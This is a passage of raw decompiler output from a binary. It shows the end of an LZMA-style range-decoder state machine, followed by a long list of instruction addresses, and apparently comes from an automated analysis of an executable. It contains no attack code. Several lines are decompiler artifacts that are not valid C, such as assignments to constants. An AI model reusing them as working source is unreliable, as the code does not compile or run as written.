											 *(__ebp - 0x6c) =  *(__ebp - 0x6c) - 1;
											 *(__ebp - 0xc) << 8 =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
											_t335 = __ebp - 0x70;
											 *_t335 =  *(__ebp - 0x70) + 1;
											__eflags =  *_t335;
											 *(__ebp - 0xc) =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
											__eax =  *(__ebp - 0x2c);
											goto L102;
										case 0xd:
											L37:
											__eflags =  *(__ebp - 0x6c);
											if( *(__ebp - 0x6c) == 0) {
												 *(__ebp - 0x88) = 0xd;
												goto L170;
											}
											__ecx =  *(__ebp - 0x70);
											__eax =  *(__ebp - 0xc);
											 *(__ebp - 0x10) =  *(__ebp - 0x10) << 8;
											__ecx =  *( *(__ebp - 0x70)) & 0x000000ff;
											 *(__ebp - 0x6c) =  *(__ebp - 0x6c) - 1;
											 *(__ebp - 0xc) << 8 =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
											_t122 = __ebp - 0x70;
											 *_t122 =  *(__ebp - 0x70) + 1;
											__eflags =  *_t122;
											 *(__ebp - 0xc) =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
											L39:
											__eax =  *(__ebp - 0x40);
											__eflags =  *(__ebp - 0x48) -  *(__ebp - 0x40);
											if( *(__ebp - 0x48) !=  *(__ebp - 0x40)) {
												goto L48;
											}
											__eflags = __ebx - 0x100;
											if(__ebx >= 0x100) {
												goto L54;
											}
											L41:
											__eax =  *(__ebp - 0x5b) & 0x000000ff;
											 *(__ebp - 0x5b) =  *(__ebp - 0x5b) << 1;
											__ecx =  *(__ebp - 0x58);
											__eax = ( *(__ebp - 0x5b) & 0x000000ff) >> 7;
											 *(__ebp - 0x48) = __eax;
											__eax = __eax + 1;
											__eax = __eax << 8;
											__eax = __eax + __ebx;
											__esi =  *(__ebp - 0x58) + __eax * 2;
											 *(__ebp - 0x10) =  *(__ebp - 0x10) >> 0xb;
											__ax =  *__esi;
											 *(__ebp - 0x54) = __esi;
											__edx = __ax & 0x0000ffff;
											__ecx = ( *(__ebp - 0x10) >> 0xb) * __edx;
											__eflags =  *(__ebp - 0xc) - __ecx;
											if( *(__ebp - 0xc) >= __ecx) {
												 *(__ebp - 0x10) =  *(__ebp - 0x10) - __ecx;
												 *(__ebp - 0xc) =  *(__ebp - 0xc) - __ecx;
												__cx = __ax;
												 *(__ebp - 0x40) = 1;
												__cx = __ax >> 5;
												__eflags = __eax;
												__ebx = __ebx + __ebx + 1;
												 *__esi = __ax;
											} else {
												 *(__ebp - 0x40) =  *(__ebp - 0x40) & 0x00000000;
												 *(__ebp - 0x10) = __ecx;
												0x800 = 0x800 - __edx;
												0x800 - __edx >> 5 = (0x800 - __edx >> 5) + __eax;
												__ebx = __ebx + __ebx;
												 *__esi = __cx;
											}
											__eflags =  *(__ebp - 0x10) - 0x1000000;
											 *(__ebp - 0x44) = __ebx;
											if( *(__ebp - 0x10) >= 0x1000000) {
												goto L39;
											} else {
												goto L37;
											}
										case 0xe:
											L46:
											__eflags =  *(__ebp - 0x6c);
											if( *(__ebp - 0x6c) == 0) {
												 *(__ebp - 0x88) = 0xe;
												goto L170;
											}
											__ecx =  *(__ebp - 0x70);
											__eax =  *(__ebp - 0xc);
											 *(__ebp - 0x10) =  *(__ebp - 0x10) << 8;
											__ecx =  *( *(__ebp - 0x70)) & 0x000000ff;
											 *(__ebp - 0x6c) =  *(__ebp - 0x6c) - 1;
											 *(__ebp - 0xc) << 8 =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
											_t156 = __ebp - 0x70;
											 *_t156 =  *(__ebp - 0x70) + 1;
											__eflags =  *_t156;
											 *(__ebp - 0xc) =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
											while(1) {
												L48:
												__eflags = __ebx - 0x100;
												if(__ebx >= 0x100) {
													break;
												}
												__eax =  *(__ebp - 0x58);
												__edx = __ebx + __ebx;
												__ecx =  *(__ebp - 0x10);
												__esi = __edx + __eax;
												__ecx =  *(__ebp - 0x10) >> 0xb;
												__ax =  *__esi;
												 *(__ebp - 0x54) = __esi;
												__edi = __ax & 0x0000ffff;
												__ecx = ( *(__ebp - 0x10) >> 0xb) * __edi;
												__eflags =  *(__ebp - 0xc) - __ecx;
												if( *(__ebp - 0xc) >= __ecx) {
													 *(__ebp - 0x10) =  *(__ebp - 0x10) - __ecx;
													 *(__ebp - 0xc) =  *(__ebp - 0xc) - __ecx;
													__cx = __ax;
													_t170 = __edx + 1; // 0x1
													__ebx = _t170;
													__cx = __ax >> 5;
													__eflags = __eax;
													 *__esi = __ax;
												} else {
													 *(__ebp - 0x10) = __ecx;
													0x800 = 0x800 - __edi;
													0x800 - __edi >> 5 = (0x800 - __edi >> 5) + __eax;
													__ebx = __ebx + __ebx;
													 *__esi = __cx;
												}
												__eflags =  *(__ebp - 0x10) - 0x1000000;
												 *(__ebp - 0x44) = __ebx;
												if( *(__ebp - 0x10) >= 0x1000000) {
													continue;
												} else {
													goto L46;
												}
											}
											L54:
											_t173 = __ebp - 0x34;
											 *_t173 =  *(__ebp - 0x34) & 0x00000000;
											__eflags =  *_t173;
											goto L55;
										case 0xf:
											L58:
											__eflags =  *(__ebp - 0x6c);
											if( *(__ebp - 0x6c) == 0) {
												 *(__ebp - 0x88) = 0xf;
												goto L170;
											}
											__ecx =  *(__ebp - 0x70);
											__eax =  *(__ebp - 0xc);
											 *(__ebp - 0x10) =  *(__ebp - 0x10) << 8;
											__ecx =  *( *(__ebp - 0x70)) & 0x000000ff;
											 *(__ebp - 0x6c) =  *(__ebp - 0x6c) - 1;
											 *(__ebp - 0xc) << 8 =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
											_t203 = __ebp - 0x70;
											 *_t203 =  *(__ebp - 0x70) + 1;
											__eflags =  *_t203;
											 *(__ebp - 0xc) =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
											L60:
											__eflags = __ebx - 0x100;
											if(__ebx >= 0x100) {
												L55:
												__al =  *(__ebp - 0x44);
												 *(__ebp - 0x5c) =  *(__ebp - 0x44);
												goto L56;
											}
											L61:
											__eax =  *(__ebp - 0x58);
											__edx = __ebx + __ebx;
											__ecx =  *(__ebp - 0x10);
											__esi = __edx + __eax;
											__ecx =  *(__ebp - 0x10) >> 0xb;
											__ax =  *__esi;
											 *(__ebp - 0x54) = __esi;
											__edi = __ax & 0x0000ffff;
											__ecx = ( *(__ebp - 0x10) >> 0xb) * __edi;
											__eflags =  *(__ebp - 0xc) - __ecx;
											if( *(__ebp - 0xc) >= __ecx) {
												 *(__ebp - 0x10) =  *(__ebp - 0x10) - __ecx;
												 *(__ebp - 0xc) =  *(__ebp - 0xc) - __ecx;
												__cx = __ax;
												_t217 = __edx + 1; // 0x1
												__ebx = _t217;
												__cx = __ax >> 5;
												__eflags = __eax;
												 *__esi = __ax;
											} else {
												 *(__ebp - 0x10) = __ecx;
												0x800 = 0x800 - __edi;
												0x800 - __edi >> 5 = (0x800 - __edi >> 5) + __eax;
												__ebx = __ebx + __ebx;
												 *__esi = __cx;
											}
											__eflags =  *(__ebp - 0x10) - 0x1000000;
											 *(__ebp - 0x44) = __ebx;
											if( *(__ebp - 0x10) >= 0x1000000) {
												goto L60;
											} else {
												goto L58;
											}
										case 0x10:
											L110:
											__eflags =  *(__ebp - 0x6c);
											if( *(__ebp - 0x6c) == 0) {
												 *(__ebp - 0x88) = 0x10;
												goto L170;
											}
											__ecx =  *(__ebp - 0x70);
											__eax =  *(__ebp - 0xc);
											 *(__ebp - 0x10) =  *(__ebp - 0x10) << 8;
											__ecx =  *( *(__ebp - 0x70)) & 0x000000ff;
											 *(__ebp - 0x6c) =  *(__ebp - 0x6c) - 1;
											 *(__ebp - 0xc) << 8 =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
											_t366 = __ebp - 0x70;
											 *_t366 =  *(__ebp - 0x70) + 1;
											__eflags =  *_t366;
											 *(__ebp - 0xc) =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
											goto L112;
										case 0x11:
											L69:
											__esi =  *(__ebp - 0x58);
											 *(__ebp - 0x84) = 0x12;
											L132:
											 *(_t612 - 0x54) = _t605;
											goto L133;
										case 0x12:
											goto L0;
										case 0x13:
											__eflags =  *(__ebp - 0x40);
											if( *(__ebp - 0x40) != 0) {
												_t469 = __ebp - 0x58;
												 *_t469 =  *(__ebp - 0x58) + 0x204;
												__eflags =  *_t469;
												 *(__ebp - 0x30) = 0x10;
												 *(__ebp - 0x40) = 8;
												goto L144;
											}
											__eax =  *(__ebp - 0x4c);
											__ecx =  *(__ebp - 0x58);
											__eax =  *(__ebp - 0x4c) << 4;
											 *(__ebp - 0x30) = 8;
											__eax =  *(__ebp - 0x58) + ( *(__ebp - 0x4c) << 4) + 0x104;
											goto L130;
										case 0x14:
											 *(__ebp - 0x30) =  *(__ebp - 0x30) + __ebx;
											__eax =  *(__ebp - 0x80);
											L140:
											 *(_t612 - 0x88) = _t533;
											goto L1;
										case 0x15:
											__eax = 0;
											__eflags =  *(__ebp - 0x38) - 7;
											0 | __eflags >= 0x00000000 = (__eflags >= 0) - 1;
											__al = __al & 0x000000fd;
											__eax = (__eflags >= 0) - 1 + 0xb;
											 *(__ebp - 0x38) = (__eflags >= 0) - 1 + 0xb;
											goto L121;
										case 0x16:
											__eax =  *(__ebp - 0x30);
											__eflags = __eax - 4;
											if(__eax >= 4) {
												_push(3);
												_pop(__eax);
											}
											__ecx =  *(__ebp - 4);
											 *(__ebp - 0x40) = 6;
											__eax = __eax << 7;
											 *(__ebp - 0x7c) = 0x19;
											 *(__ebp - 0x58) = __eax;
											goto L145;
										case 0x17:
											goto L145;
										case 0x18:
											L146:
											__eflags =  *(__ebp - 0x6c);
											if( *(__ebp - 0x6c) == 0) {
												 *(__ebp - 0x88) = 0x18;
												goto L170;
											}
											__ecx =  *(__ebp - 0x70);
											__eax =  *(__ebp - 0xc);
											 *(__ebp - 0x10) =  *(__ebp - 0x10) << 8;
											__ecx =  *( *(__ebp - 0x70)) & 0x000000ff;
											 *(__ebp - 0x6c) =  *(__ebp - 0x6c) - 1;
											 *(__ebp - 0xc) << 8 =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
											_t484 = __ebp - 0x70;
											 *_t484 =  *(__ebp - 0x70) + 1;
											__eflags =  *_t484;
											 *(__ebp - 0xc) =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
											L148:
											_t487 = __ebp - 0x48;
											 *_t487 =  *(__ebp - 0x48) - 1;
											__eflags =  *_t487;
											goto L149;
										case 0x19:
											__eflags = __ebx - 4;
											if(__ebx < 4) {
												 *(__ebp - 0x2c) = __ebx;
												L120:
												_t394 = __ebp - 0x2c;
												 *_t394 =  *(__ebp - 0x2c) + 1;
												__eflags =  *_t394;
												L121:
												__eax =  *(__ebp - 0x2c);
												__eflags = __eax;
												if(__eax == 0) {
													 *(__ebp - 0x30) =  *(__ebp - 0x30) | 0xffffffff;
													goto L170;
												}
												__eflags = __eax -  *(__ebp - 0x60);
												if(__eax >  *(__ebp - 0x60)) {
													goto L171;
												}
												 *(__ebp - 0x30) =  *(__ebp - 0x30) + 2;
												__eax =  *(__ebp - 0x30);
												_t401 = __ebp - 0x60;
												 *_t401 =  *(__ebp - 0x60) +  *(__ebp - 0x30);
												__eflags =  *_t401;
												goto L124;
											}
											__ecx = __ebx;
											__eax = __ebx;
											__ecx = __ebx >> 1;
											__eax = __ebx & 0x00000001;
											__ecx = (__ebx >> 1) - 1;
											__al = __al | 0x00000002;
											__eax = (__ebx & 0x00000001) << __cl;
											__eflags = __ebx - 0xe;
											 *(__ebp - 0x2c) = __eax;
											if(__ebx >= 0xe) {
												__ebx = 0;
												 *(__ebp - 0x48) = __ecx;
												L103:
												__eflags =  *(__ebp - 0x48);
												if( *(__ebp - 0x48) <= 0) {
													__eax = __eax + __ebx;
													 *(__ebp - 0x40) = 4;
													 *(__ebp - 0x2c) = __eax;
													__eax =  *(__ebp - 4);
													__eax =  *(__ebp - 4) + 0x644;
													__eflags = __eax;
													L109:
													__ebx = 0;
													 *(__ebp - 0x58) = __eax;
													 *(__ebp - 0x50) = 1;
													 *(__ebp - 0x44) = 0;
													 *(__ebp - 0x48) = 0;
													L113:
													__eax =  *(__ebp - 0x40);
													__eflags =  *(__ebp - 0x48) -  *(__ebp - 0x40);
													if( *(__ebp - 0x48) >=  *(__ebp - 0x40)) {
														_t392 = __ebp - 0x2c;
														 *_t392 =  *(__ebp - 0x2c) + __ebx;
														__eflags =  *_t392;
														goto L120;
													}
													__eax =  *(__ebp - 0x50);
													 *(__ebp - 0x10) =  *(__ebp - 0x10) >> 0xb;
													__edi =  *(__ebp - 0x50) +  *(__ebp - 0x50);
													__eax =  *(__ebp - 0x58);
													__esi = __edi + __eax;
													 *(__ebp - 0x54) = __esi;
													__ax =  *__esi;
													__ecx = __ax & 0x0000ffff;
													__edx = ( *(__ebp - 0x10) >> 0xb) * __ecx;
													__eflags =  *(__ebp - 0xc) - __edx;
													if( *(__ebp - 0xc) >= __edx) {
														__ecx = 0;
														 *(__ebp - 0x10) =  *(__ebp - 0x10) - __edx;
														__ecx = 1;
														 *(__ebp - 0xc) =  *(__ebp - 0xc) - __edx;
														__ebx = 1;
														__ecx =  *(__ebp - 0x48);
														__ebx = 1 << __cl;
														__ecx = 1 << __cl;
														__ebx =  *(__ebp - 0x44);
														__ebx =  *(__ebp - 0x44) | __ecx;
														__cx = __ax;
														__cx = __ax >> 5;
														__eax = __eax - __ecx;
														__edi = __edi + 1;
														__eflags = __edi;
														 *(__ebp - 0x44) = __ebx;
														 *__esi = __ax;
														 *(__ebp - 0x50) = __edi;
													} else {
														 *(__ebp - 0x10) = __edx;
														0x800 = 0x800 - __ecx;
														0x800 - __ecx >> 5 = (0x800 - __ecx >> 5) + __eax;
														 *(__ebp - 0x50) =  *(__ebp - 0x50) << 1;
														 *__esi = __dx;
													}
													__eflags =  *(__ebp - 0x10) - 0x1000000;
													if( *(__ebp - 0x10) >= 0x1000000) {
														L112:
														_t369 = __ebp - 0x48;
														 *_t369 =  *(__ebp - 0x48) + 1;
														__eflags =  *_t369;
														goto L113;
													} else {
														goto L110;
													}
												}
												__ecx =  *(__ebp - 0xc);
												__ebx = __ebx + __ebx;
												 *(__ebp - 0x10) =  *(__ebp - 0x10) >> 1;
												__eflags =  *(__ebp - 0xc) -  *(__ebp - 0x10);
												 *(__ebp - 0x44) = __ebx;
												if( *(__ebp - 0xc) >=  *(__ebp - 0x10)) {
													__ecx =  *(__ebp - 0x10);
													 *(__ebp - 0xc) =  *(__ebp - 0xc) -  *(__ebp - 0x10);
													__ebx = __ebx | 0x00000001;
													__eflags = __ebx;
													 *(__ebp - 0x44) = __ebx;
												}
												__eflags =  *(__ebp - 0x10) - 0x1000000;
												if( *(__ebp - 0x10) >= 0x1000000) {
													L102:
													_t339 = __ebp - 0x48;
													 *_t339 =  *(__ebp - 0x48) - 1;
													__eflags =  *_t339;
													goto L103;
												} else {
													goto L100;
												}
											}
											__edx =  *(__ebp - 4);
											__eax = __eax - __ebx;
											 *(__ebp - 0x40) = __ecx;
											__eax =  *(__ebp - 4) + 0x55e + __eax * 2;
											goto L109;
										case 0x1a:
											L56:
											__eflags =  *(__ebp - 0x64);
											if( *(__ebp - 0x64) == 0) {
												 *(__ebp - 0x88) = 0x1a;
												goto L170;
											}
											__ecx =  *(__ebp - 0x68);
											__al =  *(__ebp - 0x5c);
											__edx =  *(__ebp - 8);
											 *(__ebp - 0x60) =  *(__ebp - 0x60) + 1;
											 *(__ebp - 0x68) =  *(__ebp - 0x68) + 1;
											 *(__ebp - 0x64) =  *(__ebp - 0x64) - 1;
											 *( *(__ebp - 0x68)) = __al;
											__ecx =  *(__ebp - 0x14);
											 *(__ecx +  *(__ebp - 8)) = __al;
											__eax = __ecx + 1;
											__edx = 0;
											_t192 = __eax %  *(__ebp - 0x74);
											__eax = __eax /  *(__ebp - 0x74);
											__edx = _t192;
											goto L80;
										case 0x1b:
											L76:
											__eflags =  *(__ebp - 0x64);
											if( *(__ebp - 0x64) == 0) {
												 *(__ebp - 0x88) = 0x1b;
												goto L170;
											}
											__eax =  *(__ebp - 0x14);
											__eax =  *(__ebp - 0x14) -  *(__ebp - 0x2c);
											__eflags = __eax -  *(__ebp - 0x74);
											if(__eax >=  *(__ebp - 0x74)) {
												__eax = __eax +  *(__ebp - 0x74);
												__eflags = __eax;
											}
											__edx =  *(__ebp - 8);
											__cl =  *(__eax + __edx);
											__eax =  *(__ebp - 0x14);
											 *(__ebp - 0x5c) = __cl;
											 *(__eax + __edx) = __cl;
											__eax = __eax + 1;
											__edx = 0;
											_t275 = __eax %  *(__ebp - 0x74);
											__eax = __eax /  *(__ebp - 0x74);
											__edx = _t275;
											__eax =  *(__ebp - 0x68);
											 *(__ebp - 0x60) =  *(__ebp - 0x60) + 1;
											 *(__ebp - 0x68) =  *(__ebp - 0x68) + 1;
											_t284 = __ebp - 0x64;
											 *_t284 =  *(__ebp - 0x64) - 1;
											__eflags =  *_t284;
											 *( *(__ebp - 0x68)) = __cl;
											L80:
											 *(__ebp - 0x14) = __edx;
											goto L81;
										case 0x1c:
											while(1) {
												L124:
												__eflags =  *(__ebp - 0x64);
												if( *(__ebp - 0x64) == 0) {
													break;
												}
												__eax =  *(__ebp - 0x14);
												__eax =  *(__ebp - 0x14) -  *(__ebp - 0x2c);
												__eflags = __eax -  *(__ebp - 0x74);
												if(__eax >=  *(__ebp - 0x74)) {
													__eax = __eax +  *(__ebp - 0x74);
													__eflags = __eax;
												}
												__edx =  *(__ebp - 8);
												__cl =  *(__eax + __edx);
												__eax =  *(__ebp - 0x14);
												 *(__ebp - 0x5c) = __cl;
												 *(__eax + __edx) = __cl;
												__eax = __eax + 1;
												__edx = 0;
												_t415 = __eax %  *(__ebp - 0x74);
												__eax = __eax /  *(__ebp - 0x74);
												__edx = _t415;
												__eax =  *(__ebp - 0x68);
												 *(__ebp - 0x68) =  *(__ebp - 0x68) + 1;
												 *(__ebp - 0x64) =  *(__ebp - 0x64) - 1;
												 *(__ebp - 0x30) =  *(__ebp - 0x30) - 1;
												__eflags =  *(__ebp - 0x30);
												 *( *(__ebp - 0x68)) = __cl;
												 *(__ebp - 0x14) = _t415;
												if( *(__ebp - 0x30) > 0) {
													continue;
												} else {
													L81:
													 *(__ebp - 0x88) = 2;
													goto L1;
												}
											}
											 *(__ebp - 0x88) = 0x1c;
											L170:
											_push(0x22);
											_pop(_t567);
											memcpy( *(_t612 - 0x90), _t612 - 0x88, _t567 << 2);
											_t535 = 0;
											L172:
											return _t535;
									}
								}
								L171:
								_t535 = _t534 | 0xffffffff;
								goto L172;
							}
						}
						__eax =  *(__ebp - 0x50);
						 *(__ebp - 0x10) =  *(__ebp - 0x10) >> 0xb;
						__edx =  *(__ebp - 0x50) +  *(__ebp - 0x50);
						__eax =  *(__ebp - 0x58);
						__esi = __edx + __eax;
						 *(__ebp - 0x54) = __esi;
						__ax =  *__esi;
						__edi = __ax & 0x0000ffff;
						__ecx = ( *(__ebp - 0x10) >> 0xb) * __edi;
						if( *(__ebp - 0xc) >= __ecx) {
							 *(__ebp - 0x10) =  *(__ebp - 0x10) - __ecx;
							 *(__ebp - 0xc) =  *(__ebp - 0xc) - __ecx;
							__cx = __ax;
							__cx = __ax >> 5;
							__eax = __eax - __ecx;
							__edx = __edx + 1;
							 *__esi = __ax;
							 *(__ebp - 0x50) = __edx;
						} else {
							 *(__ebp - 0x10) = __ecx;
							0x800 = 0x800 - __edi;
							0x800 - __edi >> 5 = (0x800 - __edi >> 5) + __eax;
							 *(__ebp - 0x50) =  *(__ebp - 0x50) << 1;
							 *__esi = __cx;
						}
						if( *(__ebp - 0x10) >= 0x1000000) {
							goto L148;
						} else {
							goto L146;
						}
					}
					goto L1;
				}
			}








                                                                                                                          0x00000000
                                                                                                                          0x00406969
                                                                                                                          0x00406969
                                                                                                                          0x0040696d
                                                                                                                          0x00406992
                                                                                                                          0x0040699c
                                                                                                                          0x00000000
                                                                                                                          0x0040696f
                                                                                                                          0x0040696f
                                                                                                                          0x00406972
                                                                                                                          0x00406976
                                                                                                                          0x00406979
                                                                                                                          0x0040697c
                                                                                                                          0x00406980
                                                                                                                          0x00406980
                                                                                                                          0x00406983
                                                                                                                          0x00406a5d
                                                                                                                          0x00406a5d
                                                                                                                          0x00406a64
                                                                                                                          0x00406a64
                                                                                                                          0x00406a67
                                                                                                                          0x00406a6e
                                                                                                                          0x00406a9b
                                                                                                                          0x00406a9f
                                                                                                                          0x00406aff
                                                                                                                          0x00406b02
                                                                                                                          0x00406b07
                                                                                                                          0x00406b08
                                                                                                                          0x00406b0a
                                                                                                                          0x00406b0c
                                                                                                                          0x00406b0f
                                                                                                                          0x00406a1b
                                                                                                                          0x00406a1b
                                                                                                                          0x00406a1b
                                                                                                                          0x004061b7
                                                                                                                          0x004061b7
                                                                                                                          0x004061b7
                                                                                                                          0x004061c0
                                                                                                                          0x00000000
                                                                                                                          0x00000000
                                                                                                                          0x004061c6
                                                                                                                          0x00000000
                                                                                                                          0x004061d1
                                                                                                                          0x00000000
                                                                                                                          0x00000000
                                                                                                                          0x004061da
                                                                                                                          0x004061dd
                                                                                                                          0x004061e0
                                                                                                                          0x004061e4
                                                                                                                          0x00000000
                                                                                                                          0x00000000
                                                                                                                          0x004061ea
                                                                                                                          0x004061ed
                                                                                                                          0x004061ef
                                                                                                                          0x004061f0
                                                                                                                          0x004061f3
                                                                                                                          0x004061f5
                                                                                                                          0x004061f6
                                                                                                                          0x004061f8
                                                                                                                          0x004061fb
                                                                                                                          0x00406200
                                                                                                                          0x00406205
                                                                                                                          0x0040620e
                                                                                                                          0x00406221
                                                                                                                          0x00406224
                                                                                                                          0x00406230
                                                                                                                          0x00406258
                                                                                                                          0x0040625a
                                                                                                                          0x00406268
                                                                                                                          0x00406268
                                                                                                                          0x0040626c
                                                                                                                          0x00000000
                                                                                                                          0x00000000
                                                                                                                          0x00000000
                                                                                                                          0x00000000
                                                                                                                          0x0040625c
                                                                                                                          0x0040625c
                                                                                                                          0x0040625f
                                                                                                                          0x00406260
                                                                                                                          0x00406260
                                                                                                                          0x00000000
                                                                                                                          0x0040625c
                                                                                                                          0x00406236
                                                                                                                          0x0040623b
                                                                                                                          0x0040623b
                                                                                                                          0x00406244
                                                                                                                          0x0040624c
                                                                                                                          0x0040624f
                                                                                                                          0x00000000
                                                                                                                          0x00406255
                                                                                                                          0x00406255
                                                                                                                          0x00000000
                                                                                                                          0x00406255
                                                                                                                          0x00000000
                                                                                                                          0x00406272
                                                                                                                          0x00406272
                                                                                                                          0x00406276
                                                                                                                          0x00406b22
                                                                                                                          0x00000000
                                                                                                                          0x00406b22
                                                                                                                          0x0040627f
                                                                                                                          0x0040628f
                                                                                                                          0x00406292
                                                                                                                          0x00406295
                                                                                                                          0x00406295
                                                                                                                          0x00406295
                                                                                                                          0x00406298
                                                                                                                          0x0040629c
                                                                                                                          0x00000000
                                                                                                                          0x00000000
                                                                                                                          0x0040629e
                                                                                                                          0x004062a4
                                                                                                                          0x004062ce
                                                                                                                          0x004062d4
                                                                                                                          0x004062db
                                                                                                                          0x00000000
                                                                                                                          0x004062db
                                                                                                                          0x004062aa
                                                                                                                          0x004062ad
                                                                                                                          0x004062b2
                                                                                                                          0x004062b2
                                                                                                                          0x004062bd
                                                                                                                          0x004062c5
                                                                                                                          0x004062c8
                                                                                                                          0x00000000
                                                                                                                          0x00000000
                                                                                                                          0x00000000
                                                                                                                          0x00000000
                                                                                                                          0x00000000
                                                                                                                          0x0040630d
                                                                                                                          0x00406313
                                                                                                                          0x00406316
                                                                                                                          0x00406323
                                                                                                                          0x0040632b
                                                                                                                          0x00000000
                                                                                                                          0x00000000
                                                                                                                          0x004062e2
                                                                                                                          0x004062e2
                                                                                                                          0x004062e6
                                                                                                                          0x00406b31
                                                                                                                          0x00000000
                                                                                                                          0x00406b31
                                                                                                                          0x004062f2
                                                                                                                          0x004062fd
                                                                                                                          0x004062fd
                                                                                                                          0x004062fd
                                                                                                                          0x00406300
                                                                                                                          0x00406303
                                                                                                                          0x00406306
                                                                                                                          0x0040630b
                                                                                                                          0x00000000
                                                                                                                          0x00000000
                                                                                                                          0x00000000
                                                                                                                          0x00000000
                                                                                                                          0x004069a2
                                                                                                                          0x004069a2
                                                                                                                          0x004069a8
                                                                                                                          0x004069ae
                                                                                                                          0x004069b4
                                                                                                                          0x004069ce
                                                                                                                          0x004069d1
                                                                                                                          0x004069d7
                                                                                                                          0x004069e2
                                                                                                                          0x004069e2
                                                                                                                          0x004069e4
                                                                                                                          0x004069b6
                                                                                                                          0x004069b6
                                                                                                                          0x004069c5
                                                                                                                          0x004069c9
                                                                                                                          0x004069c9
                                                                                                                          0x004069ee
                                                                                                                          0x00000000
                                                                                                                          0x00000000
                                                                                                                          0x00000000
                                                                                                                          0x00000000
                                                                                                                          0x00000000
                                                                                                                          0x004069f0
                                                                                                                          0x004069f4
                                                                                                                          0x00406ba3
                                                                                                                          0x00000000
                                                                                                                          0x00406ba3
                                                                                                                          0x00406a00
                                                                                                                          0x00406a07
                                                                                                                          0x00406a0f
                                                                                                                          0x00406a12
                                                                                                                          0x00406a15
                                                                                                                          0x00406a15
                                                                                                                          0x00000000
                                                                                                                          0x00000000
                                                                                                                          0x00406333
                                                                                                                          0x00406335
                                                                                                                          0x00406338
                                                                                                                          0x004063a9
                                                                                                                          0x004063ac
                                                                                                                          0x004063af
                                                                                                                          0x004063b6
                                                                                                                          0x004063c0
                                                                                                                          0x00000000
                                                                                                                          0x004063c0
                                                                                                                          0x0040633a
                                                                                                                          0x0040633e
                                                                                                                          0x00406341
                                                                                                                          0x00406343
                                                                                                                          0x00406346
                                                                                                                          0x00406349
                                                                                                                          0x0040634b
                                                                                                                          0x0040634e
                                                                                                                          0x00406350
                                                                                                                          0x00406355
                                                                                                                          0x00406358
                                                                                                                          0x0040635b
                                                                                                                          0x0040635f
                                                                                                                          0x00406366
                                                                                                                          0x00406369
                                                                                                                          0x00406370
                                                                                                                          0x00406374
                                                                                                                          0x0040637c
                                                                                                                          0x0040637c
                                                                                                                          0x0040637c
                                                                                                                          0x00406376
                                                                                                                          0x00406376
                                                                                                                          0x00406376
                                                                                                                          0x0040636b
                                                                                                                          0x0040636b
                                                                                                                          0x0040636b
                                                                                                                          0x00406380
                                                                                                                          0x00406383
                                                                                                                          0x004063a1
                                                                                                                          0x004063a3
                                                                                                                          0x00000000
                                                                                                                          0x00406385
                                                                                                                          0x00406385
                                                                                                                          0x00406388
                                                                                                                          0x0040638b
                                                                                                                          0x0040638e
                                                                                                                          0x00406390
                                                                                                                          0x00406390
                                                                                                                          0x00406390
                                                                                                                          0x00406393
                                                                                                                          0x00406396
                                                                                                                          0x00406398
                                                                                                                          0x00406399
                                                                                                                          0x0040639c
                                                                                                                          0x00000000
                                                                                                                          0x0040639c
                                                                                                                          0x00000000
                                                                                                                          0x004065d2
                                                                                                                          0x004065d6
                                                                                                                          0x004065f4
                                                                                                                          0x004065f7
                                                                                                                          0x004065fe
                                                                                                                          0x00406601
                                                                                                                          0x00406604
                                                                                                                          0x00406607
                                                                                                                          0x0040660a
                                                                                                                          0x0040660d
                                                                                                                          0x0040660f
                                                                                                                          0x00406616
                                                                                                                          0x00406617
                                                                                                                          0x00406619
                                                                                                                          0x0040661c
                                                                                                                          0x0040661f
                                                                                                                          0x00406622
                                                                                                                          0x00406622
                                                                                                                          0x00406627
                                                                                                                          0x00000000
                                                                                                                          0x00406627
                                                                                                                          0x004065d8
                                                                                                                          0x004065db
                                                                                                                          0x004065de
                                                                                                                          0x004065e8
                                                                                                                          0x00000000
                                                                                                                          0x00000000
                                                                                                                          0x0040663c
                                                                                                                          0x00406640
                                                                                                                          0x00406663
                                                                                                                          0x00406666
                                                                                                                          0x00406669
                                                                                                                          0x00406673
                                                                                                                          0x00406642
                                                                                                                          0x00406642
                                                                                                                          0x00406645
                                                                                                                          0x00406648
                                                                                                                          0x0040664b
                                                                                                                          0x00406658
                                                                                                                          0x0040665b
                                                                                                                          0x0040665b
                                                                                                                          0x00000000
                                                                                                                          0x00000000
                                                                                                                          0x0040667f
                                                                                                                          0x00406683
                                                                                                                          0x00000000
                                                                                                                          0x00000000
                                                                                                                          0x00406689
                                                                                                                          0x0040668d
                                                                                                                          0x00000000
                                                                                                                          0x00000000
                                                                                                                          0x00406693
                                                                                                                          0x00406695
                                                                                                                          0x00406699
                                                                                                                          0x00406699
                                                                                                                          0x0040669c
                                                                                                                          0x004066a0
                                                                                                                          0x00000000
                                                                                                                          0x00000000
                                                                                                                          0x004066f0
                                                                                                                          0x004066f4
                                                                                                                          0x004066fb
                                                                                                                          0x004066fe
                                                                                                                          0x00406701
                                                                                                                          0x0040670b
                                                                                                                          0x00000000
                                                                                                                          0x0040670b
                                                                                                                          0x004066f6
                                                                                                                          0x00000000
                                                                                                                          0x00000000
                                                                                                                          0x00406717
                                                                                                                          0x0040671b
                                                                                                                          0x00406722
                                                                                                                          0x00406725
                                                                                                                          0x00406728
                                                                                                                          0x0040671d
                                                                                                                          0x0040671d
                                                                                                                          0x0040671d
                                                                                                                          0x0040672b
                                                                                                                          0x0040672e
                                                                                                                          0x00406731
                                                                                                                          0x00406731
